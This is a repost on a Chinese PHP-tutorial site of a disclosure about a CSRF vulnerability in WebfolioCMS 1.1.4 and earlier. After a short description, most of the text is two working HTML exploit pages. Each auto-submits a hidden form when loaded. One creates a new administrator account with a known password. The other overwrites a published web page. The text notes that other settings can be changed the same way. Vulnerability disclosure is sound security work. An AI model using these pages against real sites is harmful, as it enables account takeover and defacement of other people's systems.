来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: WebfolioCMS = 1.1.4 CSRF (Add Admin/Modify Pages)作者: Ivano Binetti (http://ivanobinetti.com)下载地址: http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/d......
|
标题: WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)
作者: Ivano Binetti (http://ivanobinetti.com) 下载地址: http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download 开发这网站: http://webfolio-cms.sourceforge.net/ 影响版本: 1.1.4及更低 测试系统平台: Debian Squeeze (6.0) +------------------------------------------[CSRF缺陷by Ivano Binetti]-----------------------------------------------+ Summary 1)介绍 2)缺陷描述 3)测试示例 3.1添加管理员 3.2 修改网页 +--------------------------------------------------------------------------------------------------------------------------------+ 1)程序介绍 Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for presenting someone's work, and portfolio-like websites". 2)缺陷描述 WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a web pages, and change may any other WebfolioCMS's parameter. In this document I will demonstrate how to add an administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes. 3)测试 3.1 添加管理员 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add ADMIN account</H2> <form method="POST" name="form0" action="http:// www.2cto.com /admin/users/add "> <input type="hidden" name="user[username]" value="new_admin"/> <input type="hidden" name="user[email]" value="admin@admin.com"/> <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/> <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/> <input type="hidden" name="user[password]" value="password"/> <input type="hidden" name="re_password" value="password"/> <input type="hidden" name="user[groupId]" value="1"/> <input type="hidden" name="add" value="Add"/> </form> </body> </html> 3.2 修改网页 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to Modify published web page</H2> <form method="POST" name="form0" action="http:// www.2cto.com /admin/pages/edit/web_page_name"> <input type="hidden" name="title" value="new_title"/> <input type="hidden" name="text" value="new_text"/> <input type="hidden" name="id" value="1"/> <input type="hidden" name="titleUrlFormat" value="test"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +------------- |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
